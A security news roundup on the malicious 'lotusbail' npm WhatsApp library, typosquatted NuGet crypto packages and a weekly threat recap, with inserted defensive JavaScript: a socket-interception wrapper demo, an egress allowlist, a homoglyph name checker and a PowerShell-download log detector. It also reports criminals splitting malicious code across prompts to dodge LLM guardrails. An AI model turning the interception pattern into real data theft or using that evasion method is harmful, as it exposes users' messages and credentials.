2025-12-23 AI Startup News

Fake WhatsApp API Package on npm Steals Messages, Contacts, and Login Tokens

Cybersecurity researchers have disclosed details of a new malicious package on the npm repository that works as a fully functional WhatsApp API, but also contains the ability to intercept every message and link the attacker’s device to a victim’s WhatsApp account. The package, named “lotusbail,” has been downloaded over 56,000 times since it was first uploaded to the registry by a user named “seiren_primrose” in May 2025. Of these, 711 downloads took place over the last week. The library is still available for download as of writing.

Under the cover of a functional tool, the malware “steals your WhatsApp credentials, intercepts every message, harvests your contacts, installs a persistent backdoor, and encrypts everything before sending it to the threat actor’s server,” Koi Security researcher Tuval Admoni said in a report published over the weekend. Specifically, it’s equipped to capture authentication tokens and session keys, message history, contact lists with phone numbers, as well as media files and documents. More significantly, the library is inspired by @whiskeysockets/baileys, a legitimate WebSockets-based TypeScript library for interacting with the WhatsApp Web API. This is accomplished by means of a malicious WebSocket wrapper through which authentication information and messages are routed, thereby allowing it to capture credentials and chats.

The stolen data is transmitted to an attacker-controlled URL in encrypted form. The attack doesn’t stop there: the package also harbors covert functionality that creates persistent access to the victim’s WhatsApp account by hijacking the device-linking process with a hard-coded pairing code. “When you use this library to authenticate, you’re not just linking your application – you’re also linking the threat actor’s device,” Admoni said. “They have complete, persistent access to your WhatsApp account, and you have no idea they’re there.” Linking the attacker’s device to the target’s WhatsApp not only gives continued access to their contacts and conversations, it also outlives the package itself: uninstalling it revokes nothing, because the threat actor’s device stays linked until the victim removes it from the app’s linked-devices settings.

Koi Security’s Idan Dardikman told The Hacker News that the malicious activity is triggered when the developer uses the library to connect to WhatsApp. “The malware wraps the WebSocket client, so once you authenticate and start sending/receiving messages, the interception kicks in,” Dardikman said. “No special function needed beyond normal usage of the API. The backdoor pairing code also activates during the authentication flow – so the attacker’s device gets linked the moment you connect your app to WhatsApp.” “lotusbail” also carries anti-debugging logic: when it detects debugging tools, it drops into an infinite loop that freezes execution and stalls dynamic analysis.
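As an added example (not lotusbail’s code and not Baileys’), the block below shows the shape of the mechanism the researchers describe: a wrapper that leaves the wrapped client’s send/on API untouched while copying every frame to a collector, next to the control that catches this class of behaviour regardless of how the code looks, an egress allowlist enforced at the single place connections are created. The socket class, the hostnames and the frames are constructed for the demo; the report does not name the exfiltration host, so none is assumed to be lotusbail’s.

```javascript
// Added example, not code from lotusbail or Baileys. A transparent wrapper around
// a WebSocket-like client, and the egress control that catches what it does.

// Stand-in for a WebSocket client (constructed for the demo; real clients expose
// the same send/on surface, which is what makes a wrapper invisible to callers).
class FakeSocket {
  constructor(url) { this.url = url; this.sent = []; this.listeners = {}; }
  on(event, fn) {
    (this.listeners[event] = this.listeners[event] || []).push(fn);
    return this;
  }
  send(frame) { this.sent.push(frame); }
  // test hook: deliver an inbound frame the way a server would
  receive(frame) { for (const fn of this.listeners.message || []) fn(frame); }
}

// The interception pattern: same API, but every frame in either direction is
// also pushed to `collector` before the caller sees it. Nothing visible to the
// application changes, so "the code works".
function wrapSocket(socket, collector) {
  const origSend = socket.send.bind(socket);
  const origOn = socket.on.bind(socket);
  socket.send = (frame) => {
    collector.push({ dir: 'out', frame });
    return origSend(frame);
  };
  socket.on = (event, fn) => origOn(event, event !== 'message' ? fn
    : (frame) => { collector.push({ dir: 'in', frame }); fn(frame); });
  return socket;
}

// Defensive side: an allowlist applied at the one place connections are made.
// A library wanting to reach any other host fails closed. The allowlist is an
// assumption for the example; the WhatsApp Web host is the only expected peer.
const ALLOWED_HOSTS = new Set(['web.whatsapp.com']);

function egressAllowed(url) {
  const host = new URL(url).hostname;
  for (const allowed of ALLOWED_HOSTS) {
    if (host === allowed || host.endsWith('.' + allowed)) return true;
  }
  return false;
}

function connect(url, factory = (u) => new FakeSocket(u)) {
  if (!egressAllowed(url)) throw new Error('egress blocked: ' + url);
  return factory(url);
}

// Demo: one wrapped session. The application only ever called send/on, yet the
// collector ends up holding the auth frame and the inbound message.
function demo() {
  const collector = [];
  const sock = wrapSocket(connect('wss://web.whatsapp.com/ws/chat'), collector);
  sock.on('message', () => {});
  sock.send('{"type":"auth","token":"tok-1234"}');   // constructed frame
  sock.receive('{"type":"msg","text":"hello"}');      // constructed frame
  return collector;
}
```

The wrapper is the attacker’s half of the story and the allowlist the defender’s. A reviewer who only confirms that `send` and `on` still reach the real socket sees working code; an egress policy does not care what the code looks like, only where it connects, so a collector host fails at `connect`. The same allowlist belongs on outbound HTTP (fetch, https) and, for processes that cannot be trusted to go through the factory, at the network layer.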

“Supply chain attacks aren’t slowing down – they’re getting better,” Koi said. “Traditional security doesn’t catch this. Static analysis sees working WhatsApp code and approves it. Reputation systems have seen 56,000 downloads, and trust it. The malware hides in the gap between ‘this code works’ and ‘this code only does what it claims.’”

Malicious NuGet Packages Target the Crypto Ecosystem

The disclosure comes as ReversingLabs shared details of 14 malicious NuGet packages that impersonate Nethereum, a .NET integration library for the Ethereum blockchain, and other cryptocurrency-related tools. The packages either redirect transaction funds to attacker-controlled wallets when the transfer amount exceeds $100 or exfiltrate private keys and seed phrases. The names of the packages, published from eight different accounts, are listed below:

binance.csharp
bitcoincore
bybitapi.net
coinbase.net.api
googleads.api
nbitcoin.unified
nethereumnet
nethereumunified
netherеum.all
solananet
solnetall
solnetall.net
solnetplus
solnetunified

The packages leverage several techniques to lull users into a false sense of security, including inflating download counts and publishing dozens of new versions in a short amount of time to give the impression of active maintenance. The campaign dates back to July 2025. The malicious functionality is arranged so that it only triggers once developers have installed the packages and wired specific functions into their own applications.
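As an added example (not ReversingLabs’ tooling, nor anything from the packages), the block below implements the check a team can run against its own package references before restore: fold confusable non-ASCII letters to Latin, strip separators, and compare the result to a list of brands worth impersonating. The brand list and the confusables subset are assumptions; the candidate names are the fourteen from the report, with the odd-looking е in netherеum.all written as Cyrillic U+0435, which is an assumption about which lookalike character that entry carries.

```javascript
// Added example, not from ReversingLabs or the packages' code: a pre-install check
// that flags package names which lean on a known brand, including non-ASCII
// homoglyphs. Brand list and confusables subset are assumptions for the demo.

// Cyrillic and Greek letters that render like Latin ones (a small subset of the
// Unicode confusables table, assumed sufficient for this demo).
const CONFUSABLES = {
  '\u0430': 'a', '\u0435': 'e', '\u043e': 'o', '\u0440': 'p', '\u0441': 'c',
  '\u0443': 'y', '\u0445': 'x', '\u0456': 'i', '\u0458': 'j', '\u04bb': 'h',
  '\u03bf': 'o', '\u03b1': 'a',
};

// Legitimate names an attacker would want to impersonate (assumed list).
const BRANDS = ['nethereum', 'nbitcoin', 'solnet', 'solana', 'coinbase',
                'binance', 'bybit', 'bitcoin', 'googleads'];

// Collapse a name to an ASCII "skeleton": lowercase, confusables mapped to Latin,
// separators removed. Two names with the same skeleton look alike to a human.
function skeleton(name) {
  return Array.from(name.normalize('NFKC').toLowerCase())
    .map((ch) => CONFUSABLES[ch] || ch)
    .join('')
    .replace(/[.\-_]/g, '');
}

function hasNonAscii(name) { return /[^\x00-\x7f]/.test(name); }

// Classic Levenshtein distance, for close misspellings of a brand.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                         d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
    }
  }
  return d[a.length][b.length];
}

// Returns the reasons a name is suspicious; an empty list means nothing matched.
function checkName(name, brands = BRANDS) {
  const reasons = [];
  const skel = skeleton(name);
  if (hasNonAscii(name)) reasons.push('non-ascii characters in name');
  for (const brand of brands) {
    if (skel === brand) {
      reasons.push('identical to ' + brand + ' after confusable folding');
    } else if (skel.includes(brand)) {
      reasons.push('embeds brand ' + brand);
    } else if (editDistance(skel, brand) <= 2) {
      reasons.push('within 2 edits of ' + brand);
    }
  }
  return reasons;
}

// Run the check over a list of names (e.g. PackageReference items from a .csproj
// or entries in packages.lock.json) and return only the flagged ones.
function auditNames(names, brands = BRANDS) {
  return names.map((n) => ({ name: n, reasons: checkName(n, brands) }))
              .filter((r) => r.reasons.length > 0);
}

// Candidate names as listed in the report; the е in netherеum.all is written as
// Cyrillic U+0435 here (an assumption about which lookalike it carries).
const REPORTED = ['binance.csharp', 'bitcoincore', 'bybitapi.net', 'coinbase.net.api',
  'googleads.api', 'nbitcoin.unified', 'nethereumnet', 'nethereumunified',
  'nether\u0435um.all', 'solananet', 'solnetall', 'solnetall.net', 'solnetplus',
  'solnetunified'];
```

In a CI step the input would come from packages.lock.json or each project’s PackageReference items rather than the literal list. A hit is not proof of malice; it is the cue to look at the publisher, the version history and the download curve, which are exactly the signals the report says were gamed.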

Notable among the packages is GoogleAds.API, which focuses on stealing Google Ads OAuth credentials rather than wallet secrets. “These values are highly sensitive, because they allow full programmatic access to a Google Ads account and, if leaked, attackers can impersonate the victim’s advertising client, read all campaign and performance data, create or modify ads, and even spend unlimited funds on a malicious or fraudulent campaign,” ReversingLabs said.

⚡ Weekly Recap: Firewall Exploits, AI Data Theft, Android Hacks, APT Attacks, Insider Leaks & More

Cyber threats last week showed how attackers no longer need big hacks to cause big damage. They’re going after the everyday tools we trust most — firewalls, browser add-ons, and even smart TVs — turning small cracks into serious breaches. The real danger now isn’t just one major attack, but hundreds of quiet ones using the software and devices already inside our networks. Each trusted system can become an entry point if it’s left unpatched or overlooked.

Here’s a clear look at the week’s biggest risks, from exploited network flaws to new global campaigns and fast-moving vulnerabilities.

⚡ Threat of the Week

Flaws in Multiple Network Security Products Come Under Attack — Over the past week, Fortinet, SonicWall, Cisco, and WatchGuard said vulnerabilities in their products have been exploited by threat actors in real-world attacks. Cisco said CVE-2025-20393, a critical flaw in AsyncOS, has been exploited by a China-nexus advanced persistent threat (APT) actor codenamed UAT-9686 to deliver malware such as ReverseSSH (aka AquaTunnel), Chisel, AquaPurge, and AquaShell. The flaw remains unpatched.

SonicWall said attacks exploiting CVE-2025-40602, a local privilege escalation flaw impacting Secure Mobile Access (SMA) 100 series appliances, have been observed in combination with CVE-2025-23006 (CVSS score 9.8) to achieve unauthenticated remote code execution with root privileges. The development comes as firewalls and edge appliances have become a favorite target, since compromising one gives attackers deeper visibility into traffic, VPN connections, and downstream systems.

🔔 Top News

Featured Chrome Extension Caught Harvesting AI Chats — Urban VPN Proxy, a Google Chrome and Microsoft Edge extension with more than 7.3 million installations, was observed stealthily gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots such as OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. Three other extensions from the same developer, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker, were also updated with similar functionality.

Collectively, these add-ons were installed more than eight million times. The extensions are no longer available for download from the Chrome Web Store.

Ink Dragon Targets Governments with ShadowPad and FINALDRAFT — The threat actor known as Jewelbug (CL-STA-0049, Earth Alux, Ink Dragon, and REF7707) has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America. The campaign has “impacted several dozen victims, including government entities and telecommunications organizations, across Europe, Asia, and Africa.” Ink Dragon does not merely use victims for data theft but actively repurposes them to support ongoing operations against other targets of interest.

This creates a self-sustaining infrastructure that obscures the true origin of the attacks while maximizing the utility of every compromised asset.

Kimwolf Botnet Hijacks 1.8 Million Android TVs — A new botnet named Kimwolf is powered by no less than 1.8 million Android TVs. Infections are scattered globally, with Brazil, India, the U.S., Argentina, South Africa, and the Philippines registering higher concentrations. Kimwolf is believed to share its origins with AISURU, which has been behind some of the record-breaking DDoS attacks over the past year.

It’s suspected that the attackers reused code from AISURU in the early stages, before opting to develop the Kimwolf botnet to evade detection. QiAnXin XLab said it’s possible some of these attacks may not have come from AISURU alone, and that Kimwolf may be either participating or even leading the efforts.

LongNosedGoblin Uses Group Policy For Malware Deployment — A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. Central to the group’s tradecraft are the abuse of Group Policy to push malware across the compromised network and the use of cloud services as the command-and-control channel for a backdoor dubbed NosyDoor.

The threat actor is believed to have been active since at least September 2023. The exact initial access methods used in the attacks are presently unknown.

Kimsuky Uses DocSwap Android Malware — The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of the Android data gathering malware DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express). The apps masquerade as package delivery service apps.

It’s believed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps. A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page with their Android device to install the supposed shipment tracking app and look up the status.

🔥 Trending CVEs

Hackers act fast. They can use new bugs within hours.

One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2025-14733 (WatchGuard), CVE-2025-11901, CVE-2025-14302, CVE-2025-14303, CVE-2025-14304 (pre-boot DMA protection bypass), CVE-2025-37164 (HPE OneView Software), CVE-2025-59374 (ASUS Live Update), CVE-2025-20393 (Cisco AsyncOS), CVE-2025-40602 (SonicWall SMA 100 Series), CVE-2025-66430 (Plesk), CVE-2025-33213 (NVIDIA Merlin Transformers4Rec for Linux), CVE-2025-33214 (NVIDIA NVTabular for Linux), CVE-2025-54947 (Apache StreamPark), CVE-2025-13780 (pgAdmin), CVE-2025-34352 (JumpCloud Agent), CVE-2025-14265 (ConnectWise ScreenConnect), CVE-2025-40806, CVE-2025-40807 (Siemens Gridscale X Prepay), CVE-2025-32210 (NVIDIA Isaac Lab), CVE-2025-64374 (Motors WordPress theme), CVE-2025-64669 (Microsoft Windows Admin Center), CVE-2025-46295 (Apache Commons Text), CVE-2025-68154 (systeminformation), CVE-2025-14558 (FreeBSD), and cross-site scripting and information disclosure flaws in Roundcube Webmail (no CVEs).

📰 Around the Cyber World

FBI Warns of Campaigns Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) has warned that malicious actors have impersonated senior U.S. state government, White House, and Cabinet-level officials, as well as members of Congress, to target individuals, including officials’ family members and personal acquaintances, since at least 2023. “Malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior U.S. official to establish rapport with targeted individuals,” the FBI said. “In the scheme, actors contact an individual and briefly engage on a topic the victim is versed on, with a request to move communication to a secondary, encrypted mobile messaging application, happening almost immediately.” Once the conversation has shifted to Signal or WhatsApp, the threat actors urge victims to provide an authentication code that allows the actors to sync their device with the victim’s contact list, share Personally Identifiable Information (PII) and copies of sensitive personal documents, wire funds to an overseas financial institution under false pretenses, and introduce the actor to a known associate.

Noyb Files Complaint Against TikTok, AppsFlyer and Grindr — Austrian privacy non-profit noyb has filed complaints against TikTok, AppsFlyer, and Grindr, accusing the video sharing platform of unlawfully tracking users across apps in violation of the GDPR. “A user found out about this unlawful tracking practice through an access request – which showed that, e.g.

his usage of Grindr was sent to TikTok, likely via the Israeli tracking company AppsFlyer – which allows TikTok to draw conclusions about his sexual orientation and sex life,” noyb said. “TikTok initially even withheld this information from the user, which violates Article 15 GDPR. Only after repeated inquiries, TikTok revealed that it knows which apps he used, what he did within these apps (for example, adding a product to the shopping cart) - and that this data also included information about his usage of the gay dating app Grindr.”

AuraStealer Spotted in the Wild — An emerging malware-as-a-service (MaaS) information stealer called AuraStealer has been distributed via Scam-Yourself campaigns, where victims are lured by TikTok videos disguised as product activation guides. “Viewers are instructed to manually retype and run a displayed command in an administrative PowerShell, which, however, instead of activating the software, quietly downloads and executes the malicious payload,” Gen Digital said.

“Apart from TikTok Scam-Yourself campaigns, AuraStealer is also distributed through supposedly cracked games or software, with delivery chains of varying complexity.” AuraStealer makes use of a long list of anti-analysis and obfuscation techniques, including indirect control flow obfuscation, string encryption, and exception-driven API hashing, to resist attempts to reverse engineer the malware. It’s capable of harvesting data from Chromium- and Gecko-based browsers, cryptocurrency wallets from desktop applications and browser extensions, clipboard contents, session tokens, credentials, VPNs, password managers, screenshots, and detailed system metadata. Also detected in the wild are two other information stealers named Stealka and Phantom, with the latter distributed via fake Adobe installers.

Blind Eagle Continues to Attack Colombia — Colombian institutions have continued to face attacks from a threat actor known as Blind Eagle.

The latest phishing attacks, targeting agencies under the Ministry of Commerce, Industry and Tourism (MCIT), have shifted to a more sophisticated, multi-layer flow that uses an off-the-shelf loader named Caminho to deliver DCRat. The messages are sent from compromised email accounts within the same organization to bypass security checks. “The phishing email used a legal-themed design to lure the recipient,” Zscaler said. “The email was created to appear as an official message from the Colombian judicial system, referencing a labor lawsuit with an authentic-sounding case number and date.

The email pressures the recipient to confirm receipt immediately, leveraging authority, fear of legal consequences, and confidentiality warnings to trick the recipient into taking an action, namely opening the attachment.”

Scripted Sparrow Linked to Large-Scale BEC Attacks — A sprawling Business Email Compromise (BEC) collective known as Scripted Sparrow has been observed distributing more than three million email messages each month and refining its social-engineering playbook. “The scale of the group’s operation strongly suggests the use of automation to generate and send their attack messages,” Fortra said. “The group utilizes a combination of free webmail addresses as well as addresses on domains they’ve registered specifically for their operations. The group operates by posing as various executive coaching and leadership training consultancies.” The group is estimated to have registered 119 domains and used 245 webmail addresses.

It has also used 256 bank accounts to move money out of victims’ bank accounts.

Smart Devices Run Outdated Browser Versions — An academic study by a team of Belgian researchers has found that a majority of smart devices, such as smart TVs, e-readers, and gaming consoles, ship with an embedded web browser that runs extremely outdated versions, sometimes three years or more behind. All five e-readers that were tested, and 24 of 35 smart TV models, used embedded browsers that were at least three years behind the current versions available to desktop users. Such outdated embedded browsers leave users exposed to phishing and to browser vulnerabilities that have long been fixed in current releases.

The authors said some of the issues lie in how development frameworks like Electron bundle browsers with other components. “We suspect that, for some products, this issue stems from the user-facing embedded browser being integrated with other UI components, making updates challenging – especially when bundled in frameworks like Electron, where updating the browser requires updating the entire framework,” they said in the paper. “This can break dependencies and increase development costs.”

Denmark Blames Russia For Attack on Water Utility — The Danish Defence Intelligence Service (DDIS) has blamed Russia for recent destructive and disruptive cyber attacks against the country, including a water utility in 2024, as well as distributed denial-of-service (DDoS) attacks on Danish websites in the run-up to the 2025 municipal and regional council elections. The attacks have been attributed to pro-Russian hacktivist groups Z-Pentest and NoName057(16), respectively.

“The Russian state uses both groups as instruments of its hybrid war against the West. The aim is to create insecurity in the targeted countries and to punish those who support Ukraine,” the DDIS said. “Russia’s cyber operations form part of a broader influence campaign intended to undermine Western support for Ukraine.” The statement comes a few days after a global cybersecurity advisory warned that pro-Russian hacktivist groups conduct opportunistic attacks against U.S. and global critical infrastructure.

Russia Targeted by Arcane Werewolf — Russian manufacturing companies have become the target of a threat actor known as Arcane Werewolf (aka Mythic Likho).

Campaigns undertaken by the hacking group in October and November 2025 likely leveraged phishing emails as the initial access vector that presumably contained links to a malicious archive hosted on the attackers’ server. The links directed victims to a spoofed website imitating a Russian manufacturing company. The end goal of the attacks is to deploy a custom implant named Loki 2.1 by means of a loader that’s delivered using a Go-based dropper downloaded from an external server using PowerShell code embedded into a Windows shortcut (LNK) contained in the ZIP file. In an attack chain detected in November 2025, a new C++ dropper was used to propagate the malware.

Loki 2.1 is equipped to upload/download files, inject code into a target process, terminate arbitrary processes, retrieve environment variables, and stop its own execution.

RansomHouse Upgrades to Complex Encryption — The RansomHouse (aka Jolly Scorpius) ransomware group has upgraded its file encryption process to use two different encryption keys to encrypt files as part of its attacks, in what has been described as a significant escalation and “concerning trajectory” in ransomware development. “The upgraded version’s code reveals a two-factor encryption scheme where the file is encrypted with both a primary key and a secondary key. Data encryption is processed separately for each key,” Palo Alto Networks Unit 42 said.

“This significantly increases the difficulty of decrypting the data without both keys.” The e-crime group has been active since December 2021, listing 123 victims on its data leak site. Central to the threat actor’s operations is a tool called MrAgent that provides attackers with persistent access to a victim’s environment and simplifies managing compromised hosts at scale. It’s also responsible for deploying Mario to encrypt critical VM files in the ESXi hypervisor.

LLMs and Ransomware Lifecycle — The emergence of large language models (LLMs) is likely accelerating the ransomware lifecycle, according to new findings from SentinelOne.

“We observe measurable gains in speed, volume, and multilingual reach across reconnaissance, phishing, tooling assistance, data triage, and negotiation, but no step-change in novel tactics or techniques driven purely by AI at scale,” the company said. LLMs, including those that are deployed locally, can be used to replace the manual effort associated with drafting phishing emails and localized content, search for sensitive data, and develop malicious code. The continued sightings of various dark LLMs show that criminals are gravitating toward uncensored models that allow them to evade guardrails. “Actors already chunk malicious code into benign prompts across multiple models or sessions, then assemble offline to dodge guardrails,” SentinelOne said.

“This workflow will become commoditized as tutorials and tooling proliferate, ultimately maturing into ‘prompt smuggling as a service.’” The findings signal that the barrier to entry into cybercrime continues to drop, even as the ransomware ecosystem is splintering and the line between nation-state and crimeware activity is increasingly blurring. The technology is also likely to blur existing assessment lines around tradecraft and attribution, because it lets smaller groups acquire capabilities that were once limited to advanced state-backed actors.

TikTok Signs Agreement to Create New U.S. Joint Venture — Nearly a year after TikTok’s operations were briefly banned in the U.S. for national security concerns, the popular video-sharing platform said it has finalized a deal to move a substantial portion of its U.S. business under a new joint venture named TikTok USDS Joint Venture LLC. According to reports from Axios, Bloomberg, CNBC, and The Hollywood Reporter, the company has signed agreements with the three managing investors: Oracle, Silver Lake, and Abu Dhabi-based MGX. Together, those companies will own 45% of the U.S. operation, while ByteDance retains a nearly 20% share. The new entity is said to be responsible for protecting U.S. data, ensuring the security of its prized algorithm, content moderation, and “software assurance.” Oracle will be the trusted security partner in charge of auditing and validating compliance. The agreement is set to go into effect on January 22, 2026.

Under a national security law, China-based ByteDance was required to divest TikTok’s U.S. operations or face an effective ban in the country. The U.S. government has since extended the ban four times as a deal was being hatched behind the scenes.

Under President Donald Trump’s executive order in September, the attorney general was blocked from enforcing the national security law for a 120-day period in order to “permit the contemplated divestiture to be completed,” allowing the deal to finalize by January 23, 2026.

Android Adware Campaign Targets East and Southeast Asia — Android users in the Philippines, Pakistan, and Malaysia have been targeted by a large-scale Android adware campaign dubbed GhostAd that silently drains resources and disrupts normal phone use through persistent background activity. The set of 15 apps, distributed via Google Play, masqueraded as harmless utility and emoji-editing tools such as Vivid Clean and GenMoji Studio. “Behind their cheerful icons, these apps created a persistent background advertising engine – one that kept running even after users closed or rebooted their devices, quietly consuming battery and mobile data,” Check Point said.

“GhostAd integrates multiple legitimate advertising software development kits (SDKs), including Pangle, Vungle, MBridge, AppLovin, and BIGO, but uses them in a way that violates fair-use policies. Instead of waiting for user interaction, the apps continuously load, queue, and refresh ads in the background, using Kotlin coroutines to sustain the cycle.” The apps have since been removed by Google, but not before they amassed millions of downloads.

Texas Sues TV Makers for Spying on Owners — Texas Attorney General Ken Paxton accused Sony, Samsung, LG, Hisense, and TCL of spying on their customers and illegally collecting their data by using automatic content recognition (ACR), according to a new lawsuit. “ACR in its simplest terms is an uninvited, invisible digital invader,” Paxton said.

“This software can capture screenshots of a user’s television display every 500 milliseconds, monitor viewing activity in real time, and transmit that information back to the company without the user’s knowledge or consent. This conduct is invasive, deceptive, and unlawful.”

Cybercriminals Entice Insiders with High Payouts — Check Point has called attention to dark web posts that aim to recruit insiders within organizations to gain access to corporate networks, user devices, and cloud environments. The activity targets the financial sector and cryptocurrency firms, as well as companies like Accenture, Genpact, Netflix, and Spotify. The ads offer payouts from $3,000 to $15,000 for access or data.

“Across darknet forums, employees are being approached, or even volunteering, to sell access or sensitive information for lucrative rewards,” the company said. “When internal staff disable defenses, leak credentials, or provide privileged information, preventing an attack becomes exponentially harder. Monitoring the deep web and darknet for organizational mentions or stolen data is now as critical as deploying advanced cyber prevention technologies.”

Flaws in Anno 1404 Game — Synacktiv researchers have disclosed multiple vulnerabilities in the strategy game Anno 1404 that, if chained together, allow for arbitrary code execution from within the multiplayer mode.

JSCEAL Campaign Undergoes a Shift — A Facebook ads campaign that’s used to distribute a compiled V8 JavaScript (JSC) malware called JSCEAL has evolved into a more sophisticated form, with the attackers adopting a revamped command-and-control (C2) infrastructure, enhanced anti-analysis safeguards, and an updated script engine designed for increased stealth.

“In contrast to the 1H 2025 campaign, which relied primarily on .com domains, the August 2025 campaign includes a broader variety of top-level domains such as .org, .link, .net, and others,” Cato Networks said. “These domains are registered in bulk at regular intervals, suggesting an automated, scalable provisioning workflow.” What’s more, the updated infrastructure enforces stricter filtering and anti-analysis controls, blocking any HTTP request that does not present a PowerShell User-Agent. In the event a request includes the correct PowerShell User-Agent, the server responds with a fake PDF error rather than delivering the actual payload. It’s only after the PDF has been returned that the C2 server delivers the next stage, including a modified version of the ZIP file containing the stealer malware.
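The gating behaviour just described is distinctive enough to detect from proxy logs. The block below is an added example (not Cato’s detection logic): it parses a simple per-request log format, keeps only requests that carry a PowerShell User-Agent, alerts once per client/host pair when the host is not one PowerShell should be talking to, and alerts again when a small application/pdf response from a host is followed by an application/zip from the same host. The log format, the host allowlist, the size threshold and the four sample lines are all constructed for the example.

```javascript
// Added example, not Cato's own detection content: flag the request sequence the
// report describes (PowerShell User-Agent to an unfamiliar host, a tiny "PDF"
// response, then a ZIP from the same host) over proxy log lines. Log layout,
// hosts and thresholds are assumptions; the lines are constructed, not real.

const SAMPLE_LOG = [
  '2025-12-19T10:00:01Z 10.0.0.5 GET https://cdn-update.link/verify "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1" 200 application/pdf 612',
  '2025-12-19T10:00:03Z 10.0.0.5 GET https://cdn-update.link/verify "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1" 200 application/zip 2097152',
  '2025-12-19T10:00:07Z 10.0.0.9 GET https://intranet.example/update.zip "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1" 200 application/zip 4096',
  '2025-12-19T10:01:00Z 10.0.0.5 GET https://www.example.com/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0" 200 text/html 12000',
];

// ts client method url "user-agent" status content-type bytes
const LINE_RE = /^(\S+) (\S+) (\S+) (\S+) "([^"]*)" (\d{3}) (\S+) (\d+)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return {
    ts: m[1], client: m[2], method: m[3], url: m[4], ua: m[5],
    status: Number(m[6]), ctype: m[7].toLowerCase(), bytes: Number(m[8]),
    host: new URL(m[4]).hostname,
  };
}

// Windows PowerShell 5.x sends "WindowsPowerShell/5.1..."; PowerShell 7 sends
// "PowerShell/7...". Both carry the token.
const isPowerShellUA = (ua) => /PowerShell\//i.test(ua);

// Hosts PowerShell is expected to reach (internal repos, the gallery). Assumed.
const PS_ALLOWED = new Set(['intranet.example', 'www.powershellgallery.com']);
const MAX_DECOY_PDF_BYTES = 4096; // a real document is rarely this small

function detect(lines) {
  const alerts = [];
  const unknownHostSeen = new Set();
  const decoyPdfSeen = new Map(); // "client|host" -> ts of the small PDF response
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev || !isPowerShellUA(ev.ua)) continue;
    const key = ev.client + '|' + ev.host;
    if (!PS_ALLOWED.has(ev.host) && !unknownHostSeen.has(key)) {
      unknownHostSeen.add(key);
      alerts.push({ rule: 'powershell-ua-to-unknown-host',
                    client: ev.client, host: ev.host, ts: ev.ts });
    }
    if (ev.ctype === 'application/pdf' && ev.bytes <= MAX_DECOY_PDF_BYTES) {
      decoyPdfSeen.set(key, ev.ts);
    } else if (ev.ctype === 'application/zip' && decoyPdfSeen.has(key)) {
      alerts.push({ rule: 'decoy-pdf-then-zip', client: ev.client, host: ev.host,
                    firstSeen: decoyPdfSeen.get(key), ts: ev.ts });
    }
  }
  return alerts;
}
```

Each rule is cheap but noisy on its own (update scripts do pull ZIPs with PowerShell); the value is the pairing, and the `firstSeen` timestamp on the second alert points an analyst at the exact request whose decoy PDF to pull from the proxy cache.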

Third Defendant Pleads Guilty to Hacking Fantasy Sports and Betting Website — Nathan Austad, 21, of Farmington, Minnesota, has pleaded guilty in connection with a scheme to hack thousands of user accounts at an unnamed fantasy sports and betting website and sell access to those accounts with the goal of stealing hundreds of thousands of dollars from users. Austad and others launched a credential stuffing attack on the website in November 2022 and fully compromised approximately 60,000 user accounts. “In some instances, Austad and his co-conspirators were able to add a new payment method of their own on the account (i.e., to a newly added financial account belonging to the hacker) and then use it to withdraw all the existing funds in the victim account to themselves, thus stealing the funds in each affected Victim Account,” the U.S. Justice Department said.

“Using this method, Austad and others stole approximately $600,000 from approximately 1,600 victim accounts on the Betting Website.” Access to the victim accounts was then sold on various websites that traffic in stolen accounts.

Drop in Critical CVEs in 2025 — The number of critical vulnerabilities flagged in 2025 stands at 3,753, down from 4,629 in 2023 and 4,283 in 2024, even as the total number of CVEs has grown to more than 40,000. According to VulnCheck, about 25.9% of the 43,002 CVEs published in 2025 have been enriched with a CVSS v4 score. “What this ultimately suggests is that CVSS v4 adoption is constrained not by lack of availability, but by limited participation from some of the largest and most influential CVE publishers and enrichers,” it said.

“Commonly cited reasons include resource constraints, required tooling changes, and a perception that CVSS v4 provides limited additional value while increasing scoring complexity and operational overhead.”

Amadey Uses Self-Hosted GitLab Instance to Distribute StealC — A new Amadey malware loader campaign has leveraged a compromised self-hosted GitLab instance (“gitlab.bzctoons[.]net”) to deliver the StealC infostealer. “This analysis reveals how threat actors are hijacking abandoned, self-hosted GitLab servers to create a legitimate-looking payload distribution infrastructure,” Trellix said. “The use of a long-standing domain with valid TLS certificates provides an effective evasion technique against traditional security controls.” While the domain appears to belong to a small-scale organization hosting GitLab with multiple users, evidence suggests that either the user account or the entire infrastructure has been compromised.

